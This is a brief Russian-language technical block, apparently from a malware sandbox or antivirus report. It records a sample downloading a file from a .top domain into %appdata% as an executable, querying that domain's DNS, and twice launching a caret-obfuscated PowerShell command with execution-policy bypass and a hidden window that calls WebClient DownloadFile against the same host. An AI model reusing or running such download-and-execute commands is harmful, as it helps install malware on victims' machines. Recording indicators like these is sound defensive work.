Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOW^ErShel^l.ExE -executION^pOlI^CY^ ^bY^pASS -^n^oPRo^FIlE -WI^ndo^W^s^Tyl^E Hi^dd^eN^ ^(N^ew-OBJ^E^Ct^ ^s^ysTem^.^net.^WEB^clIEN^t)^.d^owN^l^oAD^FilE('http://hometowergop.top/...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /C "pOW^ErShel^l.ExE -executION^pOlI^CY^ ^bY^pASS -^n^oPRo^FIlE -WI^ndo^W^s^Tyl^E Hi^dd^eN^ ^(N^ew-OBJ^E^Ct^ ^s^ysTem^.^net.^WEB^clIEN^t)^.d^owN^l^oAD^FilE('http://hometowergop.top/...' (со скрытым окном)